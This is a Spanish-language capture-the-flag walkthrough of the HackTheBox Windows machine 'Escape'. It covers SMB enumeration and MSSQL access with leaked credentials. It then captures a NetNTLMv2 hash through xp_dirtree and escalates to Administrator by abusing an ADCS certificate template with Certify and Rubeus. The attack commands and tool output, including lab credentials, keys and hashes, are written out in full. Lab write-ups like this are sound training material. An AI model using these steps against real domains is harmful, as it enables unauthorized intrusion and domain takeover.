18 min to read
Escape - HackTheBox
📡En esta ocasión estoy ante una máquina Windows nivel Medium
de la plataforma HackThebox que me ha parecido muy interesante y con la que se aprenden técnicas nuevas📡.
Un pequeño INDICE
Reconocimiento #
Comenzamos lanzando nmap como de costumbre para encontrar puertos abiertos en la máquina víctima.
❯ nmap -p- -Pn -n --min-rate 5000 10.10.11.202 -oG puertos_escape
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-02 19:10 CET
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Podemos ver que tenemos 4 puertos abiertos, los siguientes…
Pero antes de nada procedo a lanzar otro escaneo de nmap para que me arroje más detalles sobre estos puertos, lanzando una serie de scripts básicos de nmap y detectando las versiones y los servicios que corren en cada puerto.
Esto lo hago con el siguiente comando
nmap -p53,135,139,445 -Pn -n -sCV 10.10.11.202 -oN servicios
Tenemos estos puertos abiertos, y en ellos corren estos servicios.
Puerto | Servicio | Versión |
---|---|---|
53 | dns | Simple DNS Plus |
135 | msrpc | Microsoft Windows RPC |
139 | netbios-ssn | Microsoft Windows netbios-ssn |
445 | microsoft-ds | SMB |
Comenzaré enumerando un poco el Samba.
Voy a enumerar recursos compartidos de la máquina, esto lo haré con la herramienta SMBMAP.
Empleando una null sesión utilizando un usuario al azar podemos enumerar los recursos compartidos existentes y a cuales tenemos acceso.
Tenemos acceso a los recursos IPC$ y a Public.
Consigo acceder a IPC$ pero no tengo permisos para listar archivos en su interior por lo que solo me queda acceder al recurso Public.
Al acceder veo un pdf que me descargo y abro para ver su contenido.
Básicamente nos explica como acceder a la base de datos SQL, nos da unas credenciales y nos avisa de que debemos utilizar la autenticación de Windows.
PublicUser:GuestUserCantWrite1
Y además de eso veo un par de nombres que podrían ser usuarios existentes –> Ryan, Tom, Brandon.
También tenemos el dominio sequel.htb
Como tenemos posibles credenciales para conectarnos accedo a la base de datos usando mssqlclient.py
.
impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
Explotación #
Intento usar xp_cmdshell para intentar ejecutar comandos en el sistema y conseguir ganar acceso a través de una reverse shell pero no me deja.
SQL> xp_cmdshell whomai
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
Tras buscar información encontré un artículo que podría servirme.
(https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478)[https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478]
Este artículo muestra como ejecutando un pequeño comando en la base de datos podemos conseguir el hash netntlmv2 del usuario que gestiona la base de datos, es muy sencillo.
EXEC master.sys.xp_dirtree '\\10.10.11.202\Public',1, 1
Y a su vez con smbserver.py
capturamos el hash.
sudo impacket-smbserver $(pwd) filetransfer -smb2support
Tras obtener el hash me lo copio en un archivo y lo craqueo usando John The Ripper.
Consigo craquear el hash del usuario sql_svc y las contraseña es REGGIE1234ronnie
Al tener credenciales válidas intento conectarme a la máquina a través de WinRM usando la herramienta evil-winrm.
ruby evil-winrm.rb -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Tras desplazarme por los directorios encuentro el usuario Ryan.Cooper, por lo que supongo que el siguiente paso es migrarme a este usuario.
Enumerando un poco encuentro el directorio donde se almacena toda la información relacionada con el servicio SQL y veo que hay una carpeta llamada Logs donde podría haber algo de interés, por lo que accedo al mismo y encuentro esta información.
Ahí podemos ver credenciales del usuario Ryan.Cooper:NuclearMosquito3
, por lo que trato de acceder con estas credenciales a la máquina a través de evil-winrm como anteriormente.
ruby evil-winrm.rb -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
Escalada de Privilegios #
Ahora ya toca migrar al usuario administrador, es decir, toca escalar privilegios.
Para escalar privilegios subo el archivo Certify.exe ya compilado para buscar plantillas de certificados vulnerables.
Lo lanzo con el siguiente comando y me arroja toda la información.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Tras obtener esta información debemos lanzar de nuevo la herramienta certify.exe para obtener el certificado del usuario Administrador y obtenemos su clave privada, esto lo haremos con los datos que obtuvimos antes con la plantilla vulnerable.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 24
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0iIsK5UMjkMqzMh6IpbcJR18qpfJ+JK/n2qOagV4DvgcRKJ/
WSwGCuOazuapnXq+fZM6oBpU9d2B9y8maBI9KrWHny/1BKf51YN/piDn0r57Yw6M
dRj0rdFD6VDYwMtU4xFZ+X6qpMT/omxNYOwAuqfzWX3HWOBPaLZaN2PJNT+2XNdG
IDdQPfTxNENH+AKQeP0hfLLw0QWzr3Z6NqbbuMDacP6hZ/Tfl5woiVmKv28/ySnA
vC/UVo19xS/iupjwIJZj8z86CKj6AndFBPOolveSsze4NZAEtK1HKrMrvNwjZXRZ
kFFMLrJ7E5af/3wVQ1246OjaQ9kpohh6VqMaCQIDAQABAoIBAQCT0/iQ/H1lw7jj
chICLXFYJwNiHAC5f7uREex4h7prhX6Vhl/iwsbJeE+bSMiAgi5qt13h7kRg52Ec
HS5+vn4LgsOTaLCNgwKOg8EUhUexidHR4RVM966CbZrCE9842pKwX6+VhtfTrMdO
Y7SX/8+PgMIA7iyEyOD0gHy9RNTzQMTbsqcy4dOmg/TvDwtZXe2r/3K4LbEjmo+6
HmH1gtbxPX7m+1ukuDTWPWuDRLZQZLeXxgBVVHc9vByn91kGguR3gGXkg7YOKiKr
up2Owi1l5xGySeQnFUpfMAyMGgW3K8uXDr3c9Ej8nml+OxI/szv0oQJ3ezzz3jQw
4rOOpqGlAoGBAPrMDvBJTiPhYKM0wkAAxRQHiyQ2Dj3Dp7BuA1d6mUmKinVR5f5E
bYsbBCdVlV2BRUN8NCWZ8UkeE0kq5ongxz0pbwt6j0O4WOKpB8jldXAHq57nnjVf
Oh6UEalHvf/px/jHvA4rXpNkw1FaU9RsbRFkxPG6XYgb7bRITtOvHS4LAoGBANZ+
KA/NY1k2kwfY3psZr8YdXMkoA2QG2xOMcRjzm3mPYpY/aoinGNNmENAQXhtNTjz5
Ut2scVMAACAGRySL82LwpCz5Kg82RqLaKf+tZp8rmSKI3a1dQ/NZ0xJLdum1lh0s
mJndU5HSU9R4zzX3zo673DrVP/cG6iGKR1X9mmi7AoGAN6wclNJw+h4JqbEIfdSt
6uhRxtQJDUTlcJC7RSv94wlR+wEXIP5nor14ipLA+WS8z2I+4SnvGeAHP/K6AllX
YQhVkiK+srW1ZXtIMxxcmWXafwfDYu2kpS0RTpaSYsCul1cfM7YE5Is1oFWAzmLT
Q00vOsm4AYLRnXd/qBXzUEkCgYEAvVCUI35wlalplJ+Buvus/PuljZZXh83VRyfK
Gu/I5j38EgjfCsYRT2TiqgIITaipyX91+FnfnBaABcQEvukXZNhoz5kL2mlZZxuP
vi9aSFq+ypBquD19YCiD973LsvOnDxDxj7ydqjMt8na+zS9vjOOaugLGdk4QEJJv
7CHuS0kCgYBptYpDw8/yQ0z0nG3PjnmwfvH8JGqzKB+O+xAPPdDpK6+0v8/tPn7I
E/rVDbxtY4ENNk4vRx/GEk5FNLYb+NR590e+I5iPWc8tlJd7/u4S7yBhLp/BX1mH
RArrtaotO3CoAG1RnmTp/LMqqN37TEeEj9qjq8hMrir/s4e1S1FreA==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIF6DCCBNCgAwIBAgITHgAAABg9/MYiepkuJwAAAAAAGDANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwMzAzMDMzOTEzWhcNMjUwMzAz
MDM0OTEzWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDSIiwrlQyOQyrMyHoiltwlHXyq
l8n4kr+fao5qBXgO+BxEon9ZLAYK45rO5qmder59kzqgGlT13YH3LyZoEj0qtYef
L/UEp/nVg3+mIOfSvntjDox1GPSt0UPpUNjAy1TjEVn5fqqkxP+ibE1g7AC6p/NZ
fcdY4E9otlo3Y8k1P7Zc10YgN1A99PE0Q0f4ApB4/SF8svDRBbOvdno2ptu4wNpw
/qFn9N+XnCiJWYq/bz/JKcC8L9RWjX3FL+K6mPAglmPzPzoIqPoCd0UE86iW95Kz
N7g1kAS0rUcqsyu83CNldFmQUUwusnsTlp//fBVDXbjo6NpD2SmiGHpWoxoJAgMB
AAGjggLCMIICvjA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFGVOmxmq36mdL4JDRVowemNHqJ/W
MB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8Egbwwgbkw
gbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAs
Q049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmln
dXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxp
c3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYB
BQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMt
Q0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2Vz
LENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRl
P2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG
9w0BAQsFAAOCAQEAON/PsHxpJpc4H0RLJhv7/E66GIEeP7yxnQ3si2fUniJ7TD1f
gu/x5VHmTesCGh2h6zY5S7szGwzlZ+1LPWCx+un+Wna53NMH7A+7GLJWSdjWgZEt
1c/D7lEG9xa39UiM3+S+feLAhGBVgtNKff6cMtKhUlpQO+AVow21UiW5DIioEYSH
GDP1Gl0J34MxnPU78TDV0E46Xc1fXfiENiKTRRveaWAHVH8xqDR1q98yt9QaBCjU
hlLVoFeT3Ipg+9Zf22+mDvcSdP5vB+hdZUxlQgmPPzPcKnX+Xm8EU/17NpITkIR1
v23UVfEv3DAqZPrBuQD2bZ8qhrcbfFb1bCt71Q==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Obtenemos la clave privada y el certificado que debemos copiarnos a un archivo para posteriormente convertirlo de .pem a .pfx usando este comando.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Una vez convertido usaremos rubeus.exe
, que debemos subir a la máquina junto al certificado.pfx
para obtener el hash NTLM para poder conectarnos con evil-winrm como administrador.
./rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::a947:6718:ea49:512e%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 3/2/2023 7:56:10 PM
EndTime : 3/3/2023 5:56:10 AM
RenewTill : 3/9/2023 7:56:10 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : 11MbvUjP0nSkxSOrYsM+nA==
ASREP (key) : 46C25F427523D3611F7533B287E88287
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
En la última línea podemos encontrar el hash NTLM que debemos copiarnos para conectarnos como usuario Admnistrador y poder leer la flag de root.txt